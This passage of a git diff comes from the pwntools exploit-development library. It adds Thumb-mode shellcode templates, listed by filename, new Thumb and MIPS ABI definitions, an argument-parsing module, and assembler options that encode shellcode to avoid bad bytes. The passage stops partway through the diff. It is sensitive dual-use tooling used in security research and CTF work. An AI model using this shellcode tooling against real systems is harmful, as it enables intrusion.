pwnlib/shellcraft/templates/thumb/linux/chown.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/chroot.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/clock_getres.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/clock_gettime.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/clock_nanosleep.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/clock_settime.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/clone.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/close.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/creat.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/dup2.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/dup3.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/echo.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/epoll_create.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/epoll_create1.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/epoll_ctl.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/epoll_pwait.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/epoll_wait.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/execve.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/exit.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/faccessat.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/fallocate.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/fchdir.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/fchmod.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/fchmodat.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/fchown.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/fchownat.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/fcntl.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/fdatasync.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/flock.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/fork.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/forkbomb.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/forkexit.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/fstat.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/fstat64.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/fstatat64.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/fsync.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/ftruncate.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/ftruncate64.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/futimesat.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/getcwd.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/getegid.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/geteuid.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/getgid.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/getgroups.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/getitimer.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/getpeername.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/getpgid.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/getpgrp.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/getpid.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/getpmsg.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/getppid.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/getpriority.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/getresgid.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/getresuid.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/getrlimit.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/getrusage.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/getsid.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/getsockname.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/getsockopt.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/gettimeofday.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/getuid.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/gtty.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/ioctl.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/ioperm.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/iopl.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/kill.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/killparent.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/lchown.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/link.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/linkat.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/loader.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/loader_append.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/lseek.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/lstat.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/lstat64.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/madvise.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/mincore.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/mkdir.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/mkdirat.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/mknod.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/mknodat.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/mlock.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/mlockall.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/mmap.asm mode change 100644 => 120000 pwnlib/shellcraft/templates/thumb/linux/mov.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/mprotect.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/mq_notify.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/mq_open.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/mq_timedreceive.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/mq_timedsend.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/mq_unlink.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/mremap.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/msync.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/munlock.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/munlockall.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/munmap.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/nanosleep.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/nice.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/open.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/openat.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/pause.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/pipe.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/pipe2.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/poll.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/ppoll.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/prctl.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/pread.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/preadv.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/prlimit64.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/profil.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/ptrace.asm mode change 100644 => 120000 pwnlib/shellcraft/templates/thumb/linux/push.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/putpmsg.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/pwrite.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/pwritev.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/read.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/readahead.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/readdir.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/readlink.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/readlinkat.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/readn.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/readv.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/recv.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/recvfrom.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/recvmmsg.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/recvmsg.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/remap_file_pages.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/rename.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/renameat.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/rmdir.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/sched_get_priority_max.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/sched_get_priority_min.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/sched_getaffinity.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/sched_getparam.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/sched_getscheduler.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/sched_rr_get_interval.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/sched_setaffinity.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/sched_setparam.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/sched_setscheduler.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/sched_yield.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/select.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/sendfile.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/sendfile64.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/setdomainname.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/setgid.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/setgroups.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/sethostname.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/setitimer.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/setpgid.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/setpriority.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/setregid.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/setresgid.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/setresuid.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/setreuid.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/setrlimit.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/setsid.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/settimeofday.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/setuid.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/sigaction.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/sigaltstack.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/signal.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/sigpending.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/sigprocmask.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/sigreturn.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/sigsuspend.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/splice.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/stage.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/stat.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/stat64.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/stime.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/stty.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/symlink.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/symlinkat.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/sync.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/sync_file_range.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/syslog.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/tee.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/time.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/timer_create.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/timer_delete.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/timer_getoverrun.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/timer_gettime.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/timer_settime.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/truncate.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/truncate64.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/ulimit.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/umask.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/uname.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/unlink.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/unlinkat.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/unshare.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/ustat.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/utime.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/utimensat.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/utimes.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/vfork.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/vhangup.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/vmsplice.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/wait4.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/waitid.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/waitpid.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/write.asm create mode 100644 pwnlib/shellcraft/templates/thumb/linux/writev.asm create mode 100644 pwnlib/shellcraft/templates/thumb/memcpy.asm create mode 100644 pwnlib/shellcraft/templates/thumb/popad.asm create mode 100644 pwnlib/shellcraft/templates/thumb/pushad.asm create mode 100644 pwnlib/shellcraft/templates/thumb/setregs.asm create mode 100644 pwnlib/shellcraft/templates/thumb/to_arm.asm create mode 100644 pwnlib/shellcraft/templates/thumb/trap.asm create mode 100644 pwnlib/shellcraft/templates/thumb/udiv_10.asm create mode 100644 pwnlib/util/getdents.py diff --git a/.travis.yml b/.travis.yml index 56e4f3ab6..23deab4d1 100644 --- a/.travis.yml +++ b/.travis.yml @@ -4,6 +4,7 @@ addons: apt: packages: - gcc-multilib + - gcc-4.6-arm-linux-gnueabihf cache: - pip - directories: diff --git a/docs/source/conf.py b/docs/source/conf.py index e8e49f59f..000ba0650 100644 --- a/docs/source/conf.py +++ b/docs/source/conf.py @@ -45,9 +45,11 @@ doctest_global_setup = ''' import sys, os os.environ['PWNLIB_NOTERM'] = '1' +os.environ['PWNLIB_RANDOMIZE'] = '0' import pwnlib pwnlib.context.context.reset_local() pwnlib.context.ContextType.defaults['log_level'] = 'ERROR' +pwnlib.context.ContextType.defaults['randomize'] = False pwnlib.term.text.when = 'never' pwnlib.log.install_default_handler() pwnlib.log.rootlogger.setLevel(1) diff --git a/docs/source/shellcraft/thumb.rst b/docs/source/shellcraft/thumb.rst index c2da6b31d..8beaddbe6 100644 --- a/docs/source/shellcraft/thumb.rst +++ b/docs/source/shellcraft/thumb.rst @@ -1,7 +1,7 @@ .. testsetup:: * from pwn import * - context.clear(arch='arm') + context.clear(arch='thumb') :mod:`pwnlib.shellcraft.thumb` --- Shellcode for Thumb Mode =========================================================== diff --git a/pwn/__init__.py b/pwn/__init__.py index 8dee0ee25..07a0b3d3b 100644 --- a/pwn/__init__.py +++ b/pwn/__init__.py @@ -1,81 +1,8 @@ # Promote useful stuff to toplevel from .toplevel import * -log = getLogger('pwnlib.exploit') +pwnlib.args.initialize() +pwnlib.log.install_default_handler() -# look for special args in argv -def closure(): - term_mode = True - import sys - if not hasattr(sys, 'argv'): - return - import string, collections - global args - args = collections.defaultdict(str) - def isident(s): - first = string.uppercase + '_' - body = string.digits + first - if not s: - return False - if s[0] not in first: - return False - if not all(c in body for c in s[1:]): - return False - return True - def asbool(s): - if s.lower() == 'true': - return True - elif s.lower() == 'false': - return False - elif s.isdigit(): - return bool(int(s)) - else: - raise ValueError('must be integer or boolean') - # parse environtment variables - for k, v in os.environ.items(): - if not k.startswith('PWNLIB_'): - continue - k = k[7:] - if k == 'DEBUG': - if asbool(v): - context.log_level = 'DEBUG' - elif k == 'SILENT': - if asbool(v): - context.log_level = 'ERROR' - elif k == 'NOTERM': - if asbool(v): - term_mode = False - elif isident(k): - args[k] = v - # parse command line - # save a copy of argv for the log file header (see below) - argv = sys.argv[:] - for arg in argv: - if arg == 'DEBUG': - sys.argv.remove(arg) - context.log_level = 'DEBUG' - elif arg == 'SILENT': - sys.argv.remove(arg) - context.log_level = 'ERROR' - elif arg == 'NOTERM': - term_mode = False - elif arg.find('=') > 0: - k, v = arg.split('=', 1) - if not isident(k): - continue - sys.argv.remove(arg) - args[k] = v - if 'LOG_LEVEL' in args: - context.log_level = args['LOG_LEVEL'] - if 'LOG_FILE' in args: - context.log_file = args['LOG_FILE'] - # put the terminal in rawmode unless NOTERM was specified - if term_mode: - term.init() - # install a log handler and turn logging all the way up - import pwnlib.log as log - import logging - log.install_default_handler() - -closure() -del closure +log = pwnlib.log.getLogger('pwnlib.exploit') +args = pwnlib.args.args diff --git a/pwn/toplevel.py b/pwn/toplevel.py index 6d165da4f..42df2e729 100644 --- a/pwn/toplevel.py +++ b/pwn/toplevel.py @@ -21,6 +21,7 @@ from pwnlib.encoders import * from pwnlib.elf import ELF from pwnlib.elf import load +from pwnlib.encoders import * from pwnlib.exception import PwnlibException from pwnlib.fmtstr import FmtStr, fmtstr_payload from pwnlib.log import getLogger @@ -44,6 +45,7 @@ from pwnlib.util import safeeval from pwnlib.util.cyclic import * from pwnlib.util.fiddling import * +from pwnlib.util.getdents import * from pwnlib.util.hashes import * from pwnlib.util.lists import * from pwnlib.util.misc import * diff --git a/pwnlib/__init__.py b/pwnlib/__init__.py index 728eaeb3d..09e12ecc0 100644 --- a/pwnlib/__init__.py +++ b/pwnlib/__init__.py @@ -5,6 +5,7 @@ version = __version__ __all__ = [ + 'args', 'asm', 'atexception', 'atexit', diff --git a/pwnlib/abi.py b/pwnlib/abi.py index 2f73eac72..183683b53 100644 --- a/pwnlib/abi.py +++ b/pwnlib/abi.py @@ -34,6 +34,8 @@ def default(): (32, 'i386', 'linux'): linux_i386, (64, 'amd64', 'linux'): linux_amd64, (32, 'arm', 'linux'): linux_arm, + (32, 'thumb', 'linux'): linux_arm, + (32, 'mips', 'linux'): linux_mips, (32, 'i386', 'windows'): windows_i386, (64, 'amd64', 'windows'): windows_amd64, }[(context.bits, context.arch, context.os)] @@ -45,6 +47,8 @@ def syscall(): (32, 'i386', 'linux'): linux_i386_syscall, (64, 'amd64', 'linux'): linux_amd64_syscall, (32, 'arm', 'linux'): linux_arm_syscall, + (32, 'thumb', 'linux'): linux_arm_syscall, + (32, 'mips', 'linux'): linux_mips_syscall, }[(context.bits, context.arch, context.os)] @staticmethod @@ -54,6 +58,7 @@ def sigreturn(): (32, 'i386', 'linux'): linux_i386_sigreturn, (64, 'amd64', 'linux'): linux_amd64_sigreturn, (32, 'arm', 'linux'): linux_arm_sigreturn, + (32, 'thumb', 'linux'): linux_arm_sigreturn, }[(context.bits, context.arch, context.os)] class SyscallABI(ABI): @@ -77,10 +82,14 @@ class SigreturnABI(SyscallABI): linux_i386 = ABI([], 4, 0) linux_amd64 = ABI(['rdi','rsi','rdx','rcx','r8','r9'], 8, 0) linux_arm = ABI(['r0', 'r1', 'r2', 'r3'], 8, 0) +linux_aarch64 = ABI(['x0', 'x1', 'x2', 'x3'], 16, 0) +linux_mips = ABI(['$a0','$a1','$a2','$a3'], 4, 0) linux_i386_syscall = SyscallABI(['eax', 'ebx', 'ecx', 'edx', 'esi', 'edi', 'ebp'], 4, 0) linux_amd64_syscall = SyscallABI(['rax','rdi', 'rsi', 'rdx', 'r10', 'r8', 'r9'], 8, 0) linux_arm_syscall = SyscallABI(['r7', 'r0', 'r1', 'r2', 'r3', 'r4', 'r5', 'r6'], 4, 0) +linux_aarch64_syscall = SyscallABI(['x8', 'x0', 'x1', 'x2', 'x3', 'x4', 'x5', 'x6'], 16, 0) +linux_mips_syscall = ABI(['$v0', '$a0','$a1','$a2','$a3'], 4, 0) linux_i386_sigreturn = SigreturnABI(['eax'], 4, 0) linux_amd64_sigreturn = SigreturnABI(['rax'], 4, 0) @@ -93,101 +102,3 @@ class SigreturnABI(SyscallABI): linux_i386_srop = ABI(['eax'], 4, 0) linux_amd64_srop = ABI(['rax'], 4, 0) linux_arm_srop = ABI(['r7'], 4, 0) - - -''' === OLD CODE === -class AbiCall(Call): - """ - Encapsulates ABI-specific information about a function call, which is - to be executed with ROP. - """ - #: Mapping of registers to the values to which they should be set, before - #: $pc is set to ``addr``. - registers = {} - - #: List of values which must appear in-order on the stack, including all - #: padding required by the ABI (e.g. Windows x64 requires a minimum of 32 bytes) - stack = [] - - def __new__(cls, *a, **kw): - # Allow explicit creation of subclasses - if cls != AbiCall: - return super(AbiCall, cls).__new__(cls, *a, **kw) - - # Do not allow explicit creation of AbiCall. - # Default to the best choice. - abis = { - ('i386',32,'linux'): x86LinuxAbiCall, - ('amd64',64,'linux'): amd64LinuxAbiCall, - ('arm',32,'linux'): armLinuxAbiCall - } - - key = (context.arch, context.bits, context.os) - - if key not in abis: - log.error("Don't know how to make ROP calls for %r" % (key,)) - - return super(AbiCall, cls).__new__(abis[key], *a, **kw) - - def __init__(self, name, target, args): - super(AbiCall, self).__init__(name, target, args) - self.registers = {} - self.stack = [] - - self.build() - - -class StackAdjustingAbiCall(AbiCall): - """ - Encapsulates information about a calling convention which - may capture arguments on the stack, and as such the stack - pointer must be adjusted in order to continue ROP execution. - - This functionality is separated out from the normal ABI call - so that optimizations can be performed on the last call in - the stack if there are no arguments. - """ - def build(self, addr = None): - self.stack.append(StackAdjustment()) - -class x86LinuxAbiCall(StackAdjustingAbiCall): - def build(self, addr = None): - super(x86LinuxAbiCall, self).build() - - self.stack.extend(self.args) - -class amd64LinuxAbiCall(StackAdjustingAbiCall): - def build(self, addr = None): - super(amd64LinuxAbiCall, self).build() - - registers = ['rdi','rsi','rdx','rcx','r8','r9'] - - for reg, arg in zip(registers, self.args): - self.registers[reg] = arg - - self.stack.extend(self.args[len(registers):]) - -class armLinuxAbiCall(StackAdjustingAbiCall): - def build(self, addr = None): - super(armLinuxAbiCall, self).build() - - registers = ['r0','r1','r2','r3'] - args = list(self.args) - - for reg, arg in zip(registers, args): - self.registers[reg] = arg - - self.stack.extend(self.args[len(registers):]) - -class x86SysretCall(x86LinuxAbiCall): - def build(self, addr = None): - super(x86SysretCall, self).build() - self.stack = list(self.args) - self.regs = {'eax': constants.i386.SYS_sigreturn} - -class x64SysretCall(AbiCall): - def build(self, addr = None): - super(x64SysretCall, self).build() - self.stack = list(self.args) - self.regs = {'rax': constants.amd64.SYS_sigreturn} -''' diff --git a/pwnlib/args.py b/pwnlib/args.py new file mode 100644 index 000000000..66d1fd8b6 --- /dev/null +++ b/pwnlib/args.py @@ -0,0 +1,112 @@ +#!/usr/bin/env python2 +""" +""" +import collections +import logging +import os +import string +import sys +from .context import context +from . import term + +term_mode = False +args = collections.defaultdict(str) +env_prefix = 'PWNLIB_' + +def isident(s): + """ + Helper function to check whether a string is a valid identifier, + as passed in on the command-line. + """ + first = string.uppercase + '_' + body = string.digits + first + if not s: + return False + if s[0] not in first: + return False + if not all(c in body for c in s[1:]): + return False + return True + +def asbool(s): + """ + Convert a string to its boolean value + """ + if s.lower() == 'true': + return True + elif s.lower() == 'false': + return False + elif s.isdigit(): + return bool(int(s)) + else: + raise ValueError('must be integer or boolean: %r' % s) + +def set_log_level(x): + with context.local(log_level=x): + context.defaults['log_level']=context.log_level + +def set_log_file(x): + context.log_file=x + +def set_log_level_error(x): + set_log_level('error') + +def set_log_level_debug(x): + set_log_level('debug') + +def set_noterm(v): + if asbool(v): + global term_mode + term_mode = False + +def set_timeout(v): + context.defaults['timeout'] = int(v) + +def set_randomize(v): + context.defaults['randomize'] = asbool(v) + +def set_multiply(v): + context.defaults['multiply'] = int(v, 0) + +hooks = { + 'LOG_LEVEL': set_log_level, + 'LOG_FILE': set_log_file, + 'DEBUG': set_log_level_debug, + 'NOTERM': set_noterm, + 'SILENT': set_log_level_error, + 'RANDOMIZE': set_randomize, + 'MULTIPLY': set_multiply, + 'TIMEOUT': set_timeout +} + +def initialize(): + global args, term_mode + + for k, v in os.environ.items(): + if not k.startswith(env_prefix): + continue + k = k[len(env_prefix):] + + if k in hooks: + hooks[k](v) + elif isident(k): + args[k] = v + + argv = sys.argv[:] + for arg in sys.argv[:]: + orig = arg + value = 'True' + + if '=' in arg: + arg, value = arg.split('=') + + if arg in hooks: + sys.argv.remove(orig) + hooks[arg](value) + + elif isident(arg): + sys.argv.remove(orig) + args[arg] = value + + if term_mode: + term.init() diff --git a/pwnlib/asm.py b/pwnlib/asm.py index f5555ecfe..0d7b84529 100644 --- a/pwnlib/asm.py +++ b/pwnlib/asm.py @@ -208,11 +208,15 @@ def _objdump(): def _include_header(): os = context.os arch = context.arch + include = '' if os == 'freebsd': include = 'freebsd.h' elif os == 'linux': include = 'linux/%s.h' % arch + elif os == 'cgc': + include = 'cgc/%s.h' % arch + if not include or not path.exists(path.join(_incdir, include)): log.warn_once("Could not find system include headers for %s-%s" % (arch,os)) @@ -237,7 +241,8 @@ def _arch_header(): '.arch armv7-a', '.thumb'], 'mips' : ['.set mips2', - '.set noreorder'], + '.set noreorder', + ], } return '\n'.join(prefix + headers.get(context.arch, [])) + '\n' @@ -354,7 +359,7 @@ def cpp(shellcode): return _run(cmd, code).strip('\n').rstrip() + '\n' @LocalContext -def make_elf_from_assembly(assembly, vma = 0x10000000): +def make_elf_from_assembly(assembly, vma = 0x10000000, extract=False): r""" Builds an ELF file with the specified assembly as its executable code. @@ -362,12 +367,22 @@ def make_elf_from_assembly(assembly, vma = 0x10000000): Arguments: assembly(str): Assembly + vma(int): Load address of the binary + extract(bool): Whether to return the data extracted from the file created, + or the path to it. Returns: - The path to the assembled ELF. + The path to the assembled ELF (extract=False), or the data + of the assembled ELF. """ - path = asm(assembly, vma = vma, extract = False) + if context.arch == 'thumb': + to_thumb = shellcraft.arm.to_thumb() + + if not assembly.startswith(to_thumb): + assembly = to_thumb + assembly + + path = asm(assembly, vma = vma, extract = extract) os.chmod(path, 0755) return path @@ -413,7 +428,7 @@ def make_elf(data, vma = None, strip=True, extract=True): assembler = _assembler() linker = _linker() code = _arch_header() - code += '.string "%s"' % ''.join('\\x%02x' % c for c in bytearray(data)) + code += '.string "%s"' % ''.join('\\x%02x' % ord(c) for c in data) code += '\n' log.debug("Building ELF:\n" + code) @@ -487,7 +502,7 @@ def asm(shellcode, vma = 0, extract = True): '\xb8\x17\x00\x00\x00' >>> asm("mov rax, SYS_select", arch = 'amd64', os = 'linux') 'H\xc7\xc0\x17\x00\x00\x00' - >>> asm("ldr r0, =SYS_select", arch = 'arm', os = 'linux', bits=32) + >>> asm("mov r0, #SYS_select", arch = 'arm', os = 'linux', bits=32) 'R\x00\xa0\xe3' """ result = '' @@ -545,7 +560,8 @@ def asm(shellcode, vma = 0, extract = True): result = fd.read() except Exception: - log.exception("An error occurred while assembling:\n%s" % code) + lines = '\n'.join('%4i: %s' % (i+1,line) for (i,line) in enumerate(code.splitlines())) + log.exception("An error occurred while assembling:\n%s" % lines) else: atexit.register(lambda: shutil.rmtree(tmpdir)) diff --git a/pwnlib/commandline/asm.py b/pwnlib/commandline/asm.py index 44aa3df8e..4203971f4 100644 --- a/pwnlib/commandline/asm.py +++ b/pwnlib/commandline/asm.py @@ -40,6 +40,28 @@ help = 'The os/architecture/endianness/bits the shellcode will run in (default: linux/i386), choose from: %s' % common.choices, ) +parser.add_argument( + '-v', '--avoid', + action='append', + help = 'Encode the shellcode to avoid the listed bytes (provided as hex; default: 000a)' +) + +parser.add_argument( + '-n', '--newline', + dest='avoid', + action='append_const', + const='\n', + help = 'Encode the shellcode to avoid newlines' +) + +parser.add_argument( + '-z', '--zero', + dest='avoid', + action='append_const', + const='\x00', + help = 'Encode the shellcode to avoid NULL bytes' +) + parser.add_argument( '-d', @@ -48,6 +70,12 @@ action='store_true' ) +parser.add_argument( + '-e', + '--encoder', + help="Specific encoder to use" +) + parser.add_argument( '-i', '--infile', @@ -72,6 +100,9 @@ def main(): fmt = args.format or ('hex' if tty else 'raw') formatters = {'r':str, 'h':enhex, 's':repr} + if args.avoid: + output = encode(output, args.avoid) + if args.debug: proc = gdb.debug_shellcode(output, arch=context.arch) proc.interactive() @@ -84,7 +115,8 @@ def main(): if fmt[0] == 'e': args.output.write(make_elf(output)) - os.fchmod(args.output.fileno(), 0700) + try: os.fchmod(args.output.fileno(), 0700) + except OSError: pass else: args.output.write(formatters[fmt[0]](output)) diff --git a/pwnlib/commandline/common.py b/pwnlib/commandline/common.py index 